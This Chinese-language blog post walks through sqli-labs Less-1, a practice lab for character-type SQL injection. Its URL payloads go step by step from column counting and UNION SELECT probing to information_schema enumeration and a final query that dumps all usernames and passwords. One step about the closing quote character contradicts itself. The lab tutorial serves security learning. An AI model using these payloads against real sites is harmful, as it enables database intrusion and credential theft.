文档建议反馈控制台
首页
学习
活动
专区
圈层
工具
MCP广场
文章/答案/技术大牛
发布

sqli-labs练习(第一到六关)

4 篇文章
1
sqli-labs练习(第一关)——字符型
2
sqli-labs练习(第二关)——数字型
3
sqli-labs练习(第三、四关)
4
sqli-labs练习(第五、六关)
清单首页sqli-labs练习(第一到六关)文章详情
清单「sqli-labs练习(第一到六关)01/04

sqli-labs练习(第一关)——字符型

宸寰客

首先,进入靶场

1、判断是数字型还是字符型

在url后面分别添加?id=1, ?id=2, ?id=2-1 ,观察页面的变化,判断是字符型还是数字型。 (如果id=2-1 与 id=1的页面一样,就是数字型;如果id=2-1与id=2的页面一样,就是字符型)

代码语言:javascript
代码运行次数:0
复制
http://172.16.11.222/sqli-labs/Less-1/?id=1

发现它是字符型。

2、通过报错判断闭合符

在id=2后面分别加上' , " 即单引号,双引号

代码语言:javascript
代码运行次数:0
复制
http://172.16.11.222/sqli-labs/Less-1/?id=1%27

发现加'时报错了,而加"是正常显示,说明闭合符是"。所以我们应该使用',不能让它闭合了

3、确认查询的字段数量

代码语言:javascript
代码运行次数:0
复制
http://172.16.11.222/sqli-labs/Less-1/?id=1%27%20order%20by%203%20--+

在后面分别添加order by 1 --+order by 2 --+order by 3 --+……order by n --+,观察是否报错

我们发现在by 3的时候还是正常的,而by 4的时候就没了,说明要查询的字段数量是3个。

4、确认占位信息

…… union select 1,2,3 --+

把id的值换成-1,不让它显示正常的值,然后在后面加上union select 1,2,3 --+。查看字段的占位信息。

代码语言:javascript
代码运行次数:0
复制
http://172.16.11.222/sqli-labs/Less-1/?id=-1%27union%20select%201,2,3%20--+

1的位置是dhakkan,固定的,只能在2,3下手。

5、找库名

…… union select 1,2,database() --+,把3换成database(),即在输出3的地方输出数据库名。

代码语言:javascript
代码运行次数:0
复制
http://172.16.11.222/sqli-labs/Less-1/?id=-1%27union%20select%201,2,database()%20--+

发现数据库名字是security

6、查表名

…… union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

代码语言:javascript
代码运行次数:0
复制
http://172.16.11.222/sqli-labs/Less-1/?id=-1%27union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27--+

group_concat()是把要输出的内容都放在一个分组里输出,如果不加的话,就只会输出第一个表名。如下:

代码语言:javascript
代码运行次数:0
复制
http://172.16.11.222/sqli-labs/Less-1/?id=-1%27union%20select%201,2,table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27--+

7、找表字段

至于找哪个表里的内容,当然是users表

…… union select 1,2,group_concat(column_name) from information_schema.COLUMNs where table_schema='security' and table_name='users'--+

代码语言:javascript
代码运行次数:0
复制
http://172.16.11.222/sqli-labs/Less-1/?id=-1%27union%20select%201,2,group_concat(column_name)%20from%20information_schema.COLUMNs%20where%20table_schema=%27security%27%20and%20table_name=%27users%27--+

users表里有id,username,password三个字段。

8、找用户名和密码

代码语言:javascript
代码运行次数:0
复制
http://172.16.11.222/sqli-labs/Less-1/?id=-1%27union%20select%201,2,group_concat(concat_ws(%27,%27,username,password)%20SEPARATOR%20%27|%27)%20from%20users%20--+

账号密码就出来了 不同用户以|分割,账号密码以,隔开

下一篇
举报

腾讯云开发者

扫码关注腾讯云开发者

扫码关注腾讯云开发者

领取腾讯云代金券

热门产品

热门推荐

更多推荐

Copyright © 2013 - 2025 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有

深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 深公网安备号 44030502008569

腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号 | 京公网安备号11010802020287

领券